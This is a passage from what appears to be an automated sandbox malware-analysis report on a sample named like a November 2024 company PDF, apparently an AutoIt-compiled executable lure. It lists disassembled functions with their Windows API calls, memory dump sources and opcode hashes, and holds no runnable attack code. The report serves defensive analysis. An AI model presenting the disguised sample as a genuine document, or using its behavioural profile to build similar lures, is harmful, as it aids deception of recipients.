                                                                                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A758C,80070057,?,?), ref: 007A7698
                                                                                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A758C,80070057,?), ref: 007A76A8
                                                                                                                      • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A758C,80070057,?,?), ref: 007A76B4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3897988419-0
                                                                                                                      • Opcode ID: 8e2733e7d3bfbba8d71c29c832468dfc3680dcc81aae59badff29f10facab42e
                                                                                                                      • Instruction ID: bab3d55c45605aaec1b12eae9f5c899eb35611f759c831c1550cb0c1785001ba
                                                                                                                      • Opcode Fuzzy Hash: 8e2733e7d3bfbba8d71c29c832468dfc3680dcc81aae59badff29f10facab42e
                                                                                                                      • Instruction Fuzzy Hash: 740184B2601604BBDB145F58DC44BAA7BFDEB85761F148129FD05D3211E739DE40E7A0
                                                                                                                      Function 007A85F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007A8608
                                                                                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007A8612
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007A8621
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007A8628
                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007A863E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 44706859-0
                                                                                                                      • Opcode ID: 968a3fa70a0c6d7553935bf1780dcc1fea44f2c2bd739e6b350f57e7abdf83a6
                                                                                                                      • Instruction ID: 0a0d0d43b3f212de7b95f964db5fc45b5b0400c4b261596f759dd76f3e79a666
                                                                                                                      • Opcode Fuzzy Hash: 968a3fa70a0c6d7553935bf1780dcc1fea44f2c2bd739e6b350f57e7abdf83a6
                                                                                                                      • Instruction Fuzzy Hash: 88F06D31202204AFEB101FA5DD8DE6B3BBCEF8A754B08852AF94AC7151CB799C41DA65
                                                                                                                      Function 007A8652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 007A8669
                                                                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 007A8673
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007A8682
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 007A8689
                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007A869F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 44706859-0
                                                                                                                      • Opcode ID: 5d4b9ec31aa8de7e9cceaf0f29e765d6a06d51787b357b5ca3da98e85298f33c
                                                                                                                      • Instruction ID: ab9e400f23ae58839e06bf833facd7e5aab3623e65254a8a0d1bcaf795f24f97
                                                                                                                      • Opcode Fuzzy Hash: 5d4b9ec31aa8de7e9cceaf0f29e765d6a06d51787b357b5ca3da98e85298f33c
                                                                                                                      • Instruction Fuzzy Hash: 1DF0C270201304AFEB111FA4EC88E677BBCEF8A754B144126F946C7151CB79DD00DA61
                                                                                                                      Function 007AC6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 007AC6BA
                                                                                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 007AC6D1
                                                                                                                      • MessageBeep.USER32(00000000), ref: 007AC6E9
                                                                                                                      • KillTimer.USER32(?,0000040A), ref: 007AC705
                                                                                                                      • EndDialog.USER32(?,00000001), ref: 007AC71F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3741023627-0
                                                                                                                      • Opcode ID: 4e2dd8d5db09acd9e1fbbd28aa094c28e2f48bb2476d983daeef0e1a58973bf8
                                                                                                                      • Instruction ID: 1274398bd774fa6ed33a5c5c30bd02029832c4f829c36b4c1eebc223936782e4
                                                                                                                      • Opcode Fuzzy Hash: 4e2dd8d5db09acd9e1fbbd28aa094c28e2f48bb2476d983daeef0e1a58973bf8
                                                                                                                      • Instruction Fuzzy Hash: 28018630501704ABEB229B20DD4EF9677B8FF01705F04466AF543A14E1DBF8A9548F94
                                                                                                                      Function 007513B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • EndPath.GDI32(?), ref: 007513BF
                                                                                                                      • StrokeAndFillPath.GDI32(?,?,0078BAD8,00000000,?), ref: 007513DB
                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 007513EE
                                                                                                                      • DeleteObject.GDI32 ref: 00751401
                                                                                                                      • StrokePath.GDI32(?), ref: 0075141C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2625713937-0
                                                                                                                      • Opcode ID: a22053eedcad435fe555f748fadb6bfe91bef5e1a06028ddb46ec11ac837763c
                                                                                                                      • Instruction ID: 7da069c7e559202844fb980221850a0ef5f74407969f5a4d5037bc0a876ad11a
                                                                                                                      • Opcode Fuzzy Hash: a22053eedcad435fe555f748fadb6bfe91bef5e1a06028ddb46ec11ac837763c
                                                                                                                      • Instruction Fuzzy Hash: 95F0C930005248EBDB115F2AEC0C7983BB9BB01327F54C235E8AA894F1D77989A9DF54
                                                                                                                      Function 00762E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00770FF6: std::exception::exception.LIBCMT ref: 0077102C
                                                                                                                        • Part of subcall function 00770FF6: __CxxThrowException@8.LIBCMT ref: 00771041
                                                                                                                        • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                                                                                                                        • Part of subcall function 00757BB1: _memmove.LIBCMT ref: 00757C0B
                                                                                                                      • __swprintf.LIBCMT ref: 0076302D
                                                                                                                      Strings
                                                                                                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00762EC6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                      • API String ID: 1943609520-557222456
                                                                                                                      • Opcode ID: 79e1aca166ee05fbb2a6918c341636e4624ee47315f95b149ec7fbe657e5b707
                                                                                                                      • Instruction ID: cee77dc52245df8a951c33cb649eee049c029290c655184a927d4477075a8b0e
                                                                                                                      • Opcode Fuzzy Hash: 79e1aca166ee05fbb2a6918c341636e4624ee47315f95b149ec7fbe657e5b707
                                                                                                                      • Instruction Fuzzy Hash: 07919071508341DFCB18EF24E999CAEB7A9EF85740F00491DF846972A1DB78EE48CB52
                                                                                                                      Function 007BBBA6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 007548AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007548A1,?,?,007537C0,?), ref: 007548CE
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 007BBC26
                                                                                                                      • CoCreateInstance.OLE32(007E2D6C,00000000,00000001,007E2BDC,?), ref: 007BBC3F
                                                                                                                      • CoUninitialize.OLE32 ref: 007BBC5C
                                                                                                                        • Part of subcall function 00759997: __itow.LIBCMT ref: 007599C2
                                                                                                                        • Part of subcall function 00759997: __swprintf.LIBCMT ref: 00759A0C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                      • String ID: .lnk
                                                                                                                      • API String ID: 2126378814-24824748
                                                                                                                      • Opcode ID: f04b9531967393c991328f5b202f6161ebb0542d274d8e96565b552f972d6d72
                                                                                                                      • Instruction ID: e0ab916bdfd0b03a1a7e433e8e83ac8a4a2ce8964dd2692d3c633d433da15f70
                                                                                                                      • Opcode Fuzzy Hash: f04b9531967393c991328f5b202f6161ebb0542d274d8e96565b552f972d6d72
                                                                                                                      • Instruction Fuzzy Hash: E8A12375604205DFCB00DF14C484E9ABBE5FF88314F148998F99A9B2A1CB79ED49CB91
                                                                                                                      Function 007AB7B6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • OleSetContainedObject.OLE32(?,00000001), ref: 007AB981
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ContainedObject
                                                                                                                      • String ID: AutoIt3GUI$Container$%~
                                                                                                                      • API String ID: 3565006973-1172083821
                                                                                                                      • Opcode ID: 6c113ee0b024895ffc22a1c493ee424958c33274c8ed89104b727f86a2282cda
                                                                                                                      • Instruction ID: 424e89e8e5d540f711a4a718263982cc2cb262970c31f9f45cf7e3743f4d5973
                                                                                                                      • Opcode Fuzzy Hash: 6c113ee0b024895ffc22a1c493ee424958c33274c8ed89104b727f86a2282cda
                                                                                                                      • Instruction Fuzzy Hash: D9914C71600201DFDB64DF68C884A6AB7F9FF89710F14856DF949DB2A2DB74E841CB50
                                                                                                                      Function 0077524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __startOneArgErrorHandling.LIBCMT ref: 007752DD
                                                                                                                        • Part of subcall function 00780340: __87except.LIBCMT ref: 0078037B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorHandling__87except__start
                                                                                                                      • String ID: pow
                                                                                                                      • API String ID: 2905807303-2276729525
                                                                                                                      • Opcode ID: b35c5048295206ad2d3b81c1b182f56155c3c1b146d86e506d7f7283e7dbc9cc
                                                                                                                      • Instruction ID: f1f9bc96f9922446245bde2e2b25d3f8b12b60e944e84e7ca5bcd0d5a4796e94
                                                                                                                      • Opcode Fuzzy Hash: b35c5048295206ad2d3b81c1b182f56155c3c1b146d86e506d7f7283e7dbc9cc
                                                                                                                      • Instruction Fuzzy Hash: 0F517A61A89A41C7DF947724C94137A2B94AB013D0F20CD58E49D866F6EFBC8CD8DBC6
                                                                                                                      Function 0077023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #$+
                                                                                                                      • API String ID: 0-2552117581
                                                                                                                      • Opcode ID: 00c6eb9c866c16234d15b2a0a073fa758a6c6be1ff2b1e131b843f3f7d8cee26
                                                                                                                      • Instruction ID: d14933629a63ba150fa1115b3e3bf7fcc42240a7335a2b226ba702bf2970cf3a
                                                                                                                      • Opcode Fuzzy Hash: 00c6eb9c866c16234d15b2a0a073fa758a6c6be1ff2b1e131b843f3f7d8cee26
                                                                                                                      • Instruction Fuzzy Hash: F0512375604646DFCF15DF28C888AFA7BA4EF96310F188155FC959B2A0D73C9C46CBA0
                                                                                                                      Function 00763297 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove$_free
                                                                                                                      • String ID: Oav
                                                                                                                      • API String ID: 2620147621-1091017984
                                                                                                                      • Opcode ID: 014deabd5610636d52b88ca0d0a30ab1a41dc2f39ecc3f3179e32268f2c8e641
                                                                                                                      • Instruction ID: 2115092af10062b167c9e9c675ed653636da52c0aff2eabddc21883810e9caf2
                                                                                                                      • Opcode Fuzzy Hash: 014deabd5610636d52b88ca0d0a30ab1a41dc2f39ecc3f3179e32268f2c8e641
                                                                                                                      • Instruction Fuzzy Hash: 7B5149716183419FDB28CF28C451B2BBBE1FF85314F44892DE98A87351EB39E901CB92
                                                                                                                      Function 007662F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memset$_memmove
                                                                                                                      • String ID: ERCP
                                                                                                                      • API String ID: 2532777613-1384759551
                                                                                                                      • Opcode ID: b44df5f22380ab85fa0f0700959c9cb70d1591c7c08bd909e0c4ffc9b44535dc
                                                                                                                      • Instruction ID: d4f9b99598b7927dc6facd821c18ca17ae037f58172301a25405bc580ec7a88b
                                                                                                                      • Opcode Fuzzy Hash: b44df5f22380ab85fa0f0700959c9cb70d1591c7c08bd909e0c4ffc9b44535dc
                                                                                                                      • Instruction Fuzzy Hash: 2451C271900359DFDB24CF65C885BAABBF4FF44710F60856EEA4ACB241EB789684CB41
                                                                                                                      Function 007D7BB5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,007DF910,00000000,?,?,?,?), ref: 007D7C4E
                                                                                                                      • GetWindowLongW.USER32 ref: 007D7C6B
                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 007D7C7B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Long
                                                                                                                      • String ID: SysTreeView32
                                                                                                                      • API String ID: 847901565-1698111956
                                                                                                                      • Opcode ID: c7e55cbd6a8a657843da32079134ce1d461160bffebd5df77aea92cf724c902a
                                                                                                                      • Instruction ID: 9e4785eb384bff08fe91b9afb672897396f9529e8aebd581ab54159f52d1fb78
                                                                                                                      • Opcode Fuzzy Hash: c7e55cbd6a8a657843da32079134ce1d461160bffebd5df77aea92cf724c902a
                                                                                                                      • Instruction Fuzzy Hash: 3C319D31214205AEDB158F34CC45BEA7BB9EB05324F244726F879922E0E739E851DB60
                                                                                                                      Function 007D7648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 007D76D0
                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 007D76E4
                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 007D7708
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Window
                                                                                                                      • String ID: SysMonthCal32
                                                                                                                      • API String ID: 2326795674-1439706946
                                                                                                                      • Opcode ID: 92ba4da05dac3fac9c0a14111213faefabd7df14b37c6bde2e5cf5af05af87a7
                                                                                                                      • Instruction ID: 5298da26359d121f2123e188d024345ff63defb3dd582fcdb4e7a9e68ab885a3
                                                                                                                      • Opcode Fuzzy Hash: 92ba4da05dac3fac9c0a14111213faefabd7df14b37c6bde2e5cf5af05af87a7
                                                                                                                      • Instruction Fuzzy Hash: BB219132500219ABDF158E54CC46FEA3B79EF48724F110215FE156B2D0E6B9E850DBA0
                                                                                                                      Function 007D6F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 007D6FAA
                                                                                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 007D6FBA
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 007D6FDF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
